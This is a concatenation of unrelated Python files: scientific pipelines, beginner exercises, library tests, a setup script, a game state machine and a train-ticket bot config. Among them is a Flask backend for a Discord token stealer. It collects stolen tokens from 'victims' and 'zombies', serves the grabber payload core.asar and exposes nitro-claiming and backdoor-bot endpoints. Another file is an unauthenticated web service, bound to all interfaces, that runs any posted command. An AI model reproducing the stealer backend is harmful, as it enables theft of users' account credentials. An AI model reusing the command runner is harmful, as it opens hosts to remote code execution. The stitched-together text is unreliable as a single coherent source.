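        # mapped to 0); near and below the cutoff it is blended toward 1, i.e. clear sky.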
z = self.sp.zenith * np.pi / 180
angle_above_cutoff = z - np.pi / 2 + np.pi * self.k_star_angle / 180
is_above = 1/(1 + np.exp(self.k_star_sensitivity*angle_above_cutoff))
return (self.k.mul(is_above, axis=0)
.replace(-np.inf, 0)
.replace(np.inf, 0)
.fillna(0)
.add(1 - is_above, axis=0))
class IrradianceDatasetSeries(pd.Series):
_metadata = ['location', 'k_star_sensitivity', 'k_star_angle']
@property
def _constructor(self):
return IrradianceDatasetSeries
@property
def _constructor_expanddim(self):
return IrradianceDataset
|
# Python Exercise 65: Write a program that reads several integers from the keyboard.
# At the end of execution, show the average of all values and which were the largest and smallest values read.
# The program must ask the user whether or not they want to keep entering values.
print('\033[1;33m====== EX 065 ======\033[m')
op = 'Ss'
cont = soma = media = maior = menor = 0
while op in 'Ss':
n = int(input('Digite um número: '))
soma += n
cont += 1
if cont == 1:
maior = menor = n
else:
if n > maior:
maior = n
elif n < menor:
menor = n
op = str(input('Quer continuar? [S/N]')).strip().upper()
media = soma / cont
print('Você digitou {} números e a média foi de {}'.format(cont, media))
print('O maior número foi {} e o menor {}'.format(maior, menor))
|
"""Ensure extra credentials can be supplied for inclusion in tokens.
"""
from __future__ import absolute_import, unicode_literals
import mock
from ....unittest import TestCase
from oauthlib.oauth2 import RequestValidator
from oauthlib.oauth2 import WebApplicationServer, MobileApplicationServer
from oauthlib.oauth2 import LegacyApplicationServer, BackendApplicationServer
class ExtraCredentialsTest(TestCase):
def set_client(self, request):
request.client = mock.MagicMock()
request.client.client_id = 'mocked'
return True
def setUp(self):
self.validator = mock.MagicMock(spec=RequestValidator)
self.validator.get_default_redirect_uri.return_value = 'https://i.b/cb'
self.web = WebApplicationServer(self.validator)
self.mobile = MobileApplicationServer(self.validator)
self.legacy = LegacyApplicationServer(self.validator)
self.backend = BackendApplicationServer(self.validator)
def test_post_authorization_request(self):
def save_code(client_id, token, request):
self.assertEqual('creds', request.extra)
def save_token(token, request):
self.assertEqual('creds', request.extra)
# Authorization code grant
self.validator.save_authorization_code.side_effect = save_code
self.web.create_authorization_response(
'https://i.b/auth?client_id=foo&response_type=code',
scopes=['foo'],
credentials={'extra': 'creds'})
# Implicit grant
self.validator.save_bearer_token.side_effect = save_token
self.mobile.create_authorization_response(
'https://i.b/auth?client_id=foo&response_type=token',
scopes=['foo'],
credentials={'extra': 'creds'})
def test_token_request(self):
def save_token(token, request):
self.assertIn('extra', token)
self.validator.save_bearer_token.side_effect = save_token
self.validator.authenticate_client.side_effect = self.set_client
# Authorization code grant
self.web.create_token_response('https://i.b/token',
body='grant_type=authorization_code&code=foo',
credentials={'extra': 'creds'})
# Password credentials grant
self.legacy.create_token_response('https://i.b/token',
body='grant_type=password&username=foo&password=bar',
credentials={'extra': 'creds'})
# Client credentials grant
self.backend.create_token_response('https://i.b/token',
body='grant_type=client_credentials',
credentials={'extra': 'creds'})
|
#!/usr/bin/env python
from nipype.interfaces.utility import Split
from nipype.interfaces.base import Bunch
from nipype.algorithms.modelgen import SpecifyModel
import nipype.interfaces.fsl as fsl
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.utility import Function
from nipype.interfaces.fsl import Merge
from counter import Counter
import copy
import os
def get_dm(designs,index):
from nipype.interfaces.base import Bunch
subject_info = Bunch(conditions = designs.single_events[index][0], onsets = designs.single_events[index][1], durations = designs.single_events[index][2])
return subject_info
def make_designs(log):
from stdec import stdec
# Generate session_infos for all single trials
nick = "tempsub"
conditions = ["PT","WT","PL","WL","AT","PTerr","WTerr","PLerr","WLerr","ATerr","miss"]
cond_cols = ["Code","Type"]
cond_pattern = [ [['zucz*'],['hit']],[['zsw*'],['hit']],
[['nucz*'],['incorrect']],[['nsw*'],['incorrect']],
[['zaut*'],['hit']], [['zucz*'],['incorrect']],
[['zsw*'],['incorrect']],[['nucz*'],['hit']],
[['nsw*'],['hit']],[['zaut*'],['incorrect']],
[['.*'],['miss']]]
designs = stdec(nick,log,cond_cols,conditions,cond_pattern)
designs.read_logfile()
designs.getconds()
designs.collapse_dm()
designs.extract_events()
return designs
def write_conditions(designs):
import numpy as np
import os
np.savetxt("conditions.txt",designs.all_labels,fmt="%s")
return os.path.abspath("conditions.txt")
def run_workflow(args):
eb = pe.Workflow(name='eb')
work_dir = '/home/data/scratch/UP_ST/' + args.subject
eb.base_dir = work_dir
get_designs = pe.Node(Function(input_names = ['log'], output_names = ['designs'], function=make_designs), name="get_designs")
get_designs.inputs.log = args.log
#ntrials = len(designs.all_labels)
indxs = range(120)
# Iterate over the list of timings
get_info = pe.Node(Function(input_names = ['designs','index'], output_names = ['info'], function=get_dm), name="get_info")
get_info.iterables = ('index', [1])
#get_info.iterables = ('idx', indxs)
eb.connect(get_designs,'designs',get_info,'designs')
# Save text file with trial list
write_cond = pe.Node(Function(input_names = ['designs'], output_names = ['condfile'], function=write_conditions), name="write_conditions")
eb.connect(get_designs,'designs',write_cond,'designs')
# Specify model
s = pe.Node(SpecifyModel(),name='sm')
s.inputs.input_units = 'secs'
s.inputs.time_repetition = 2.5
s.inputs.high_pass_filter_cutoff = 100.
s.inputs.functional_runs = args.file
eb.connect(get_info,'info',s,'subject_info')
# Create FSL Level 1 Design
l1d = pe.Node(fsl.Level1Design(),name='l1d')
l1d.inputs.interscan_interval = 2.5
l1d.inputs.bases = {'dgamma': {'derivs' : False}}
l1d.inputs.model_serial_correlations = False
l1d.inputs.contrasts = [('st','T',['all','st'],[0, 1])]
eb.connect(s,'session_info',l1d,'session_info')
# Get it into FEAT-compatible format
fm = pe.Node(fsl.FEATModel(),name='feet')
eb.connect(l1d,'ev_files',fm,'ev_files')
eb.connect(l1d,'fsf_files',fm,'fsf_file')
# Estimate the GLM
glm = pe.Node(fsl.GLM(),name='glm')
glm.inputs.out_cope = 'beta.nii.gz'
glm.inputs.in_file = args.file
eb.connect(fm,'design_file',glm,'design')
eb.connect(fm,'con_file',glm,'contrasts')
# Merge estimated betas into a single volume
merger = pe.JoinNode(fsl.Merge(), joinsource = 'get_info', joinfield = 'in_files', name = 'merger')
merger.inputs.dimension = 't'
merger.inputs.output_type = 'NIFTI_GZ'
eb.connect(glm,'out_cope',merger,'in_files')
# Write outputs
datasink = pe.Node(nio.DataSink(), name='sinker')
datasink.inputs.base_directory = '/home/mfalkiewicz/expriments/UP/preprocessed/deconvolution'
datasink.inputs.container = args.subject
    # eb.connect(infosource, 'subject_id', datasink, 'container')  # disabled: `infosource` is never defined in this script and the container is already set above
eb.connect(merger,'merged_file',datasink,'single_trials')
eb.connect(write_cond,'condfile',datasink,'conditions')
# Run the whole thing
#eb.run(plugin='CondorDAGMan')
#eb.run(plugin='MultiProc')
eb.run()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("-s", "--subject", dest="subject",
help="Subject name", required=True)
parser.add_argument("-f", "--infile", dest="file",
help="Input filename", required=True)
parser.add_argument("-d", "--logfile", dest="log",
help="Logfile", required=True)
args = parser.parse_args()
run_workflow(args)
|
from django.core.management.base import BaseCommand, CommandError
from static_models.view_generator import ViewStaticManager
from static_models.settings import settings
class Command(BaseCommand):
help = 'Create/update static files'
def add_arguments(self, parser):
parser.add_argument(
'--sync',
action='store_true',
help="Before generation, delete existing files.",
)
parser.add_argument(
'-o',
'--overwrite',
action='store_true',
help="Replace currently existing files (default is to ignore)",
)
parser.add_argument(
'-e',
'--html_extension',
action='store_true',
help="Add '.html' extension to generated files.",
)
    def normalize_viewsetting(self, vs):
        vs.setdefault('query', None)
        vs.setdefault('urls', [])
        vs.setdefault('filename', None)
        vs.setdefault('filename_from_field', 'pk')
        vs.setdefault('filepath', None)
def handle(self, *args, **options):
extension = ''
if (options['html_extension']):
extension = 'html'
normalised_viewsettings = [self.normalize_viewsetting(vs) for vs in settings.modelviews]
# ok, generate
count = 0
if (options['sync'] and (options['verbosity'] > 0)):
print("Directories will be cleared before generation")
for vs in settings.modelviews:
g = ViewStaticManager(
vs['view'],
vs['query'],
vs['urls'],
vs['filename'],
vs['filename_from_field'],
vs['filepath'],
overwrite=options['overwrite'],
extension=extension,
)
delete_count = 0
if (options['sync']):
delete_count = g.delete()
count = g.create()
if (options['verbosity'] > 0):
print("{} static file(s) created at '{}'".format(count, g.location))
|
z = int(input())
vetor = list(map(int, input().split()))
m2 = m3 = m4 = m5 = 0
for y in range(0, z):
if vetor[y] % 2 == 0:
m2 +=1
if vetor[y] % 3 == 0:
m3 += 1
if vetor[y] % 4 == 0:
m4 += 1
if vetor[y] % 5 == 0:
m5 += 1
print('{} Multiplo(s) de 2'.format(m2))
print('{} Multiplo(s) de 3'.format(m3))
print('{} Multiplo(s) de 4'.format(m4))
print('{} Multiplo(s) de 5'.format(m5))
|
"""
Generic utilities used by the metacells code.
Arguably all(most) of these belong in more general package(s).
All the functions included here are exported under ``metacells.ut``.
"""
from .annotation import * # pylint: disable=redefined-builtin
from .computation import *
from .documentation import *
from .logging import *
from .parallel import *
from .progress import *
from .timing import *
from .typing import *
|
import numpy as np
from translate import Translator
from sklearn.feature_extraction.text import TfidfVectorizer
translator = Translator(from_lang="Catalan", to_lang="English")
def getStops():
with open("stopwords.txt") as f:
words = [x.replace("\n", "") for x in f.readlines()]
return words
def remove_topos(text, stops=["mataró", "mataro", "maresme", "catalunya"]):
    """ Delete toponyms. """
    words = text.lower().split(" ")
    # build a new list instead of deleting while iterating (which skips words)
    return " ".join(word for word in words if word not in stops)
def remove_words(text, stops=getStops(), hard_stops=",.-_!?¡''*+^/|"):
    """ Delete stopwords. """
    for char in hard_stops:
        text = text.replace(char, "")
    words = text.lower().split(" ")
    # build a new list instead of deleting while iterating (which skips words)
    return " ".join(word for word in words if word not in stops)
def analyze(text, corpus, max_k=3):
if corpus is None:
#return corpus.split(" ")
return ""
vectorizer = TfidfVectorizer()
total_data = corpus + [text]
rankings = vectorizer.fit_transform(total_data)
i2word = vectorizer.get_feature_names()
keys = np.argsort(np.array(rankings.todense())[-1])[::-1]
keywords = [i2word[x] for x in keys[:min(max_k, len(text.split(" ")))]]
return keywords
def getKeywords(title, corpus_keys=None):
# remove toponyms - bad translated
doc_ = remove_topos(title)
# translate
doc_t = translator.translate(doc_)
# remove stopwords
doc_1 = remove_words(doc_t)
# get TfIdf
keywords = analyze(doc_1, corpus_keys, max_k=100)
return remove_words(" ".join(keywords))
def getImageURL(title, corpus_keys=None, location="mataró", max_k=3):
""" Get the url for an image based on the experience title. """
# remove toponyms - bad translated
doc_ = remove_topos(title)
# translate
doc_t = translator.translate(doc_)
# remove stopwords
doc_1 = remove_words(doc_t)
# get TfIdf
keywords = analyze(doc_1, corpus_keys, max_k=max_k)
# generate img url
print("HERE")
print(keywords)
img_url = "https://source.unsplash.com/1600x900/?" + location + "," + ",".join(keywords)
return img_url
|
__author__ = 'Meng'
|
import os
import sys
import time
import argparse
import signal
from typing import List, Optional
from enum import Enum
import subprocess
from multiprocessing import Queue, Process
from bottle import request, response, post, run, get, delete
class Status(Enum):
PENDING = 'PENDING'
RUNNING = 'RUNNING'
FAILED = 'FAILED'
SUCCEEDED = 'SUCCEEDED'
CANCELLED = 'CANCELLED'
def __str__(self):
return str(self.value)
class Batch:
def __init__(self, batch_id: str, status: Status, cli_args: List[str], pid: Optional[int] = None, log: Optional[str] = None):
self.id = batch_id
self.cli_args = cli_args
self.status = status
self.log = log
self.pid = pid
def to_dict(self):
return {
'id': self.id,
'status': str(self.status),
'log': self.log,
}
FOUR_HUNDRED_ERROR = {
'error': 'ValidationError',
'error_message': 'Must post request body of form {"args":[...]}',
}
@post('/batch/<batch_id:path>')
def post_batch(batch_id):
global batch_dict
if not request.json:
response.status = 400
return FOUR_HUNDRED_ERROR
cli_args = request.json.get('args')
if not cli_args or not isinstance(cli_args, list):
response.status = 400
return FOUR_HUNDRED_ERROR
if batch_id in batch_dict:
response.status = 400
return {
'error': 'ValidationError',
'error_message': f"Batch `{batch_id}` already exists."
}
batch = Batch(batch_id, Status.PENDING, cli_args)
batch_dict[batch_id] = batch
process_queue.put(batch)
return batch.to_dict()
def update_batch_dict():
global batch_dict
while not status_queue.empty():
status: Batch = status_queue.get()
batch_dict[status.id] = status
@get('/batch/<batch_id:path>')
def get_batch(batch_id):
update_batch_dict()
maybe_batch = batch_dict.get(batch_id)
if maybe_batch:
return maybe_batch.to_dict()
response.status = 404
return {
'error': 'NotFound',
'error_message': f"Batch `{batch_id}` not found."
}
@delete('/batch/<batch_id:path>')
def delete_batch(batch_id):
global batch_dict
update_batch_dict()
maybe_batch: Batch = batch_dict.get(batch_id)
if not maybe_batch:
response.status = 404
return {
'error': 'NotFound',
'error_message': f"Batch `{batch_id}` not found."
}
if maybe_batch.status == Status.PENDING:
response.status = 400
return {
'error': 'ValueError',
'error_message': f"Batch `{batch_id}` still pending, unable to delete."
}
os.kill(maybe_batch.pid, signal.SIGKILL)
maybe_batch.status = Status.CANCELLED
batch_dict[batch_id] = maybe_batch
return maybe_batch.to_dict()
@get('/health')
def get_health():
return {"status": "OK"}
def poll_batch(process_q: Queue, status_q: Queue):
while True:
if process_q.empty():
time.sleep(5)
else:
batch: Batch = process_q.get()
            result = run_batch(status_q, batch)  # use the queue passed to this worker (works under fork and spawn)
status_q.put(result)
def run_batch(status_q: Queue, batch: Batch):
base_log_dir = f'/var/log/steps/{batch.id}'
os.makedirs(base_log_dir, exist_ok=True)
stderr_path = f'{base_log_dir}/stderr.log'
stdout_path = f'{base_log_dir}/stdout.log'
with open(stderr_path, 'w') as stderr, open(stdout_path, 'w') as stdout, \
subprocess.Popen(batch.cli_args, stdout=stdout, stderr=stderr, env=os.environ, bufsize=8192) as proc:
batch.status = Status.RUNNING
batch.pid = proc.pid
status_q.put(batch)
return_code = proc.wait()
with open(stderr_path) as f:
batch.status = Status.SUCCEEDED if return_code == 0 else Status.FAILED
batch.log = f.read() or None
return batch
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="A container that dangerously batches arbitrary commands")
parser.add_argument('-p', '--port', help='Port to run the service on', type=int, default=8998)
parser.add_argument("-H", "--host", type=str, help="Which host to bind", default="0.0.0.0")
args = parser.parse_args()
batch_dict = {}
process_queue = Queue()
status_queue = Queue()
batch_runner_process = Process(target=poll_batch, args=(process_queue, status_queue))
batch_runner_process.daemon = True
batch_runner_process.start()
run(host=args.host, port=args.port)
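    # Example interaction with the running service (illustrative commands; default port 8998):
    #   curl -X POST localhost:8998/batch/demo -H 'Content-Type: application/json' \
    #        -d '{"args": ["echo", "hello"]}'
    #   curl localhost:8998/batch/demo            # poll the batch status and captured stderr log
    #   curl -X DELETE localhost:8998/batch/demo  # cancel a running batch (SIGKILLs the process)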
|
from backend.common_tile import CommonTile
class Plains(CommonTile):
def __init__(self):
super().__init__()
self.food = self.food + 1
self.production = self.production + 1
|
__all__ = [
'FourState']
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM
from direct.fsm import State
class FourState:
notify = DirectNotifyGlobal.directNotify.newCategory('FourState')
def __init__(self, names, durations=[
0, 1, None, 1, 1]):
self.stateIndex = 0
self.track = None
self.stateTime = 0.0
self.names = names
self.durations = durations
self.states = {0: State.State(names[0], self.enterState0, self.exitState0, [
names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1], self.enterState1, self.exitState1, [
names[2], names[3]]),
2: State.State(names[2], self.enterState2, self.exitState2, [
names[3]]),
3: State.State(names[3], self.enterState3, self.exitState3, [
names[4], names[1]]),
4: State.State(names[4], self.enterState4, self.exitState4, [
names[1]])}
self.fsm = ClassicFSM.ClassicFSM('FourState', list(self.states.values()), names[0], names[0])
self.fsm.enterInitialState()
return
def setTrack(self, track):
if self.track is not None:
self.track.pause()
self.track = None
if track is not None:
track.start(self.stateTime)
self.track = track
return
def enterStateN(self, stateIndex):
self.stateIndex = stateIndex
self.duration = self.durations[stateIndex] or 0.0
def isOn(self):
return self.stateIndex == 4
def changedOnState(self, isOn):
pass
def enterState0(self):
self.enterStateN(0)
def exitState0(self):
self.changedOnState(0)
def enterState1(self):
self.enterStateN(1)
def exitState1(self):
pass
def enterState2(self):
self.enterStateN(2)
def exitState2(self):
pass
def enterState3(self):
self.enterStateN(3)
def exitState3(self):
pass
def enterState4(self):
self.enterStateN(4)
self.changedOnState(1)
def exitState4(self):
self.changedOnState(0)
|
import sys
sys.path.insert(0,'./class')
from flask import render_template, request, render_template_string, send_file
from Cache import Cache
from Utils import Utils
import flask, json
class Api():
def __init__(self, port, config):
self.Cache = Cache('./Data/Account.json', './Data/Zombies.json', config['HOOK'])
self.base_api = config['API']['BASE']
self.app = flask.Flask(__name__)
self.Utils = Utils(config['API']['OWNER_TOKEN'])
app = self.app
self.prt = port
@app.route('/', methods= ['GET'])
def send_index():
return render_template('index.html'), 201
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('404.html'), 500
@app.route(f'{self.base_api}/send-token')
def send_token():
self.Cache.add_zombie(request.args.get('token'))
return 'ok'
        # Could be optimized for the lookup | where?
@app.route('/token', methods= ['GET'])
def token():
key = request.args.get('key')
with open('./Data/Account.json', 'r') as database:
db = json.load(database)
victim_to_send = []
victims = []
for acc in db['ACCOUNTS']:
if key in config['API']['ADMIN_KEYS']:
break
elif db['ACCOUNTS'][acc]['KEY'] == key:
victims = db['ACCOUNTS'][acc]['VICTIMS']
break
else:
return render_template('error.html')
with open('./Data/Zombies.json') as zombies_database:
zb_db = json.load(zombies_database)
for zombie in zb_db['Zombies']:
if (zb_db['Zombies'][zombie]['Token'])[:24] in victims or key in config['API']['ADMIN_KEYS']:
victim_to_send.append(zb_db['Zombies'][zombie])
return render_template('token.html', database= victim_to_send)
@app.route('/check-tokens', methods= ['GET'])
def check_tokens():
self.Cache.check_zombies()
self.Cache.send_report()
return render_template('index.html'), 201
@app.route(f'{self.base_api}/claim-nitro', methods= ['POST'])
def claim_nitro():
self.Utils.Claim_Nitro(request.args.get('code'), request.args.get('channel'))
return 'ok', 201
@app.route(f'{self.base_api}/download-core', methods= ['GET'])
def download_core():
return send_file('./Grabber/src/core.asar', as_attachment=True)
@app.route(f'{self.base_api}/get-all-tokens', methods= ['GET'])
def send_all_tokens():
return self.Cache.get_all_zombies()
@app.route(f'{self.base_api}/get-bot-infos', methods= ['GET'])
def get_bot_info():
return config['BACKDOOR_BOT_INFOS']
def start(self):
self.Cache.load_tokens()
self.Cache.check_zombies()
self.Cache.send_report()
self.app.run(host= '0.0.0.0', port= self.prt)
if __name__ == '__main__':
with open('./config.json', 'r+') as config_file:
config = json.load(config_file)
Api(config['API']['PORT'], config).start()
|
# split is the proportion of the training set that the first CRF uses
from SentenceGetter import SentenceGetter
import pandas as pd
import configparser
from Sents2Features import sent2labels
from Sents2Features import sent2features
from sklearn_crfsuite import CRF
from sklearn.model_selection import cross_val_predict
from sklearn_crfsuite.metrics import flat_classification_report
import sklearn.model_selection
def getTrainingData(split=2):
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
train_path = paths['train_path']
# train_data = pd.read_csv("CRF-is-400k-train.tsv", sep='\t')
train_data = pd.read_csv(train_path, sep='\t')
train_data = train_data.fillna(method="ffill")
train_getter = SentenceGetter(train_data)
split_index = round(split * len(train_getter.sentences)) # int(1*(len(train_getter.sentences)/3))round(prop*len(x))
if split != 2:
train_sentences_1 = train_getter.sentences[:split_index]
train_sentences_2 = train_getter.sentences[split_index:]
return train_sentences_1, train_sentences_2
else:
train_sentences_1 = train_getter.sentences
return train_sentences_1
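# Usage sketch (paths are read from ../trainConfig.ini): with a fractional split
# the first CRF gets the leading portion of the sentences and the second CRF the
# remainder; the default split=2 is a sentinel meaning "no split".
#   first_part, second_part = getTrainingData(split=0.4)  # hypothetical 40/60 split
#   all_sentences = getTrainingData()                      # everything, single list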
def getValidData():
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
# print(len(train_getter.sentences))
# print(len(y_train_1))
# print(len(y_train_2))
# valid_data = pd.read_csv("CRF-is-400k-valid.tsv", sep='\t')
valid_path = paths['valid_path']
valid_data = pd.read_csv(valid_path, sep='\t')
valid_data = valid_data.fillna(method="ffill")
valid_getter = SentenceGetter(valid_data)
valid_sentences = valid_getter.sentences
return valid_sentences
def getTestData():
config = configparser.ConfigParser()
config.read('../trainConfig.ini')
paths = config['Paths']
# test_data = pd.read_csv("CRF-is-400k-test.tsv", sep='\t')
test_path = paths['valid_path']
test_data = pd.read_csv(test_path, sep='\t')
test_data = test_data.fillna(method="ffill")
test_getter = SentenceGetter(test_data)
test_sentences = test_getter.sentences
return test_sentences
def getDataFromPath(path):
data = pd.read_csv(path, sep='\t')
data = data.fillna(method="ffill")
sent_getter = SentenceGetter(data)
sents = sent_getter.sentences
return sents
def write_to_CoNLL(mdl_file_name, sentence2features, test_sentences, write_path):
X_test_local = []
cond_rand_mdl = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=mdl_file_name)
if mdl_file_name[(len(mdl_file_name) - 1)] == '2':
old_crf = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=(mdl_file_name[:(len(mdl_file_name) - 1)]) + '1')
X_test_local = [sent2features_second_guess(s, sentence2features, old_crf) for s in test_sentences]
else:
X_test_local = [sentence2features(s) for s in test_sentences]
predictions = cond_rand_mdl.predict(X_test_local)
with open(write_path, 'a') as f:
for i in range(0, len(predictions)):
sent = test_sentences[i]
preds = predictions[i]
for j in range(0, len(sent)):
str_to_write = '{}\t{}\n'.format(sent[j][0], preds[j])
f.write(str_to_write)
f.write('\n')
def train(model_name, xtrain, ytrain):
    print('fitting CRF model {}...'.format(model_name))
crf = CRF(algorithm='lbfgs',
c1=0.0001,
c2=0.0001,
max_iterations=100,
all_possible_transitions=False,
model_filename=(model_name))
crf.fit(xtrain, ytrain)
    print('finished fitting CRF model {}'.format(model_name))
return crf
def evaluate(model_name, crf, xvalid, yvalid):
dict_1 = {}
pred = cross_val_predict(estimator=crf, X=xvalid, y=yvalid, cv=5)
# report = flat_classification_report(y_pred=pred, y_true=y_valid, labels=sorted_labels, digits=3, output_dict=True)
print(flat_classification_report(y_pred=pred, y_true=yvalid, labels=sorted_labels, digits=3))
def execute_experiment(sent_to_features_func, batch, experiment_name, result_dict, split_train_proportion = 2):
print(experiment_name)
train_sentences_1, train_sentences_2, valid_sentences, test_sentences=getData(batch)
y_train_1 = [sent2labels(s) for s in train_sentences_1]
y_valid = [sent2labels(s) for s in valid_sentences]
y_test = [sent2labels(s) for s in test_sentences]
print("getting data done....")
X_train = [sent_to_features_func(s) for s in train_sentences_1]
print("train_sents done....")
crf1 = train(experiment_name+'_1', X_train, y_train_1)
print('training done....')
X_valid1 = [sent_to_features_func(s) for s in valid_sentences]
# evaluate(model_name, crf, xvalid , yvalid):
evaluate(experiment_name + '_1', crf1, X_valid1, y_valid)
to_CoNLL(experiment_name +'_1',sent2features_final, test_sentences)
if split_train_proportion != 2:
y_train_2 = [sent2labels(s) for s in train_sentences_2]
X_train = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in train_sentences_2]
print("train_sents done....")
crf2 = train(experiment_name+'_2', X_train, y_train_2)
print('training done....')
X_valid2 = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in valid_sentences]
evaluate(experiment_name + '_2', crf2, X_valid2, y_valid)
to_CoNLL(experiment_name +'_2',sent2features_final, test_sentences)
|
# -*- coding: utf-8 -*-
"""
Set up benchmarker package.
To use the 'upload' functionality of this file, you must do:
pip install twine
"""
import io
import os
import sys
import warnings
from pathlib import Path
from shutil import rmtree
from typing import Union
from setuptools import Command, find_packages, setup
def parse_requirements(req_path: Path):
"""Parse requirements
Args:
req_path: path to requirements file
Returns:
list of requirement strings in form of "library" or "library==0.0.0"
"""
# Parse requirements from file - no need to specify them many times
# Any dependencies defined in includes are omitted.
# Only dependencies in provided file are considered
# This is intended behavior
parsed_requirements = []
with open(req_path) as f:
for line in f:
content = line.split("#")[0].strip() # remove comments
if "://" in content: # URL
warnings.warn(f"Ignoring '{content}' requirement. Setuptools does not support URLs.")
elif len(content) > 0 and content[0] != '-': # non empty and not a command
parsed_requirements.append(content)
return parsed_requirements
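# Example sketch of the parsing rules above: comments are stripped, URL
# requirements are skipped with a warning, and option lines starting with '-'
# are ignored, so a hypothetical file containing
#     numpy==1.19.5  # pinned
#     -r base.txt
#     git+https://example.com/pkg.git
# would yield ['numpy==1.19.5'].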
def read_requirements(file_path: Union[str, Path] = 'requirements/core.txt') -> list:
"""Get required packages for this module to be executed.
Args:
file_path: the requirements file path.
Returns:
list of required packages
"""
if isinstance(file_path, str):
file_path = Path(file_path)
if not file_path.exists():
return []
req_path = file_path.resolve()
return parse_requirements(req_path)
# Package meta-data.
NAME = 'benchmarker'
DESCRIPTION = 'DUE-BASELINES models for 2D document processing'
URL = ''
AUTHOR = 'Applica.ai'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = None
REQUIRES = read_requirements() + read_requirements('requirements/pre.txt')
# Create dict for extras on the basis of requirements/extras/[name].txt pattern
EXTRAS = {}
for file_path in Path('requirements/extras/').glob("*.txt"):
name = file_path.stem
reqs = read_requirements(file_path)
if len(reqs) > 0:
EXTRAS[name] = reqs
else:
warnings.warn(f'Extras group {name} does not have any valid requirements and will not be available.')
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(Path('README.md').resolve(), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(Path(NAME + '/__version__.py').resolve()) as f:
exec(f.read(), about)
VERSION = about['__version__']
else:
about['__version__'] = VERSION
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Print things in bold.
Args:
s: string to print in bold.
"""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(Path('dist').resolve())
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system(
'{0} setup.py sdist bdist_wheel --universal'.format(
sys.executable))
self.status('Uploading the package to PyPI via Twine…')
os.system('twine upload dist/*')
self.status('Pushing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
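# Usage sketch: as noted in the module docstring, install twine first, then
# `python setup.py upload` removes old builds, creates sdist/wheel archives,
# uploads them via twine, and pushes a git tag for the current version.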
if __name__ == '__main__':
# Where the magic happens:
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
# author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=['benchmarker'] + ['benchmarker.' + pkg for pkg in find_packages('benchmarker')],
install_requires=REQUIRES,
extras_require=EXTRAS,
include_package_data=True,
license='PROPRIETARY Applica',
classifiers=[
# Trove classifiers
'Development Status :: 3 - Alpha',
'License :: PROPRIETARY Applica',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
|
#coding=utf-8
import os
# Basic settings
# requests settings
TIMEOUT = 5
VERIFY = False
# directories might be used
LOCATIONS = {
'log': 'log',
'data': 'data',
}
# stderr is redirected to this file
ERR_LOG_FILE = os.path.join(LOCATIONS['log'], 'err.log')
# log in this file
LOGGING_FILE = os.path.join(LOCATIONS['log'], 'requests.log')
STATION_NAME_FILE = os.path.join(LOCATIONS['data'], 'station_name.js')
CAPTCHA_FILE = os.path.join(LOCATIONS['data'], 'captcha.png')
CRYPTO_JS = os.path.join(LOCATIONS['data'], 'crypto.js')
CRYPTO_SCRIPT = os.path.join(LOCATIONS['data'], 'do_crypto.js')
# Query settings
QUERY_INTERVAL = 1
QUERY_ARGS_NS = 'leftTicketDTO'
TRAIN_DATA_JSON_KEY = 'queryLeftNewDTO'
LOGIN_NS = 'loginUserDTO'
USER_NS = 'userDTO'
PURPOSE_CODES = {'学生': '0X00', '普通': 'ADULT'}
PURPOSE_ID = {'0X00': 3, '学生': 3, 'ADULT': 1, '普通': 1}
SEAT_CODES = {
'商务座': 'swz',
'特等座': 'tz',
'一等座': 'zy',
'二等座': 'ze',
'高级软卧': 'gr',
'软卧': 'rw',
'硬卧': 'yw',
'软座': 'rz',
'硬座': 'yz',
'无座': 'wz',
'其他': 'qt',
}
SEAT_ID = {
'SWZ': '9',
'TZ': 'P',
'ZY': 'M',
'ZE': 'O',
'GR': '6',
'RW': '4',
'YW': '3',
'RZ': '2',
'YZ': '1',
'WZ': 'WZ',
'QT': '',
}
URL_BASE = 'https://kyfw.12306.cn/'
URLS = {
'entry': URL_BASE + 'otn/',
'station_name': URL_BASE + 'otn/resources/js/framework/station_name.js?station_version=1.8260',
'query': URL_BASE + 'otn/leftTicket/queryT',
'query_log': URL_BASE + 'otn/leftTicket/log',
'login_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand',
'order_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp',
'check_captcha': URL_BASE + 'otn/passcodeNew/checkRandCodeAnsyn',
'login_token': URL_BASE + 'otn/login/init',
'order_init_token': URL_BASE + 'otn/leftTicket/init',
'login': URL_BASE + 'otn/login/loginAysnSuggest',
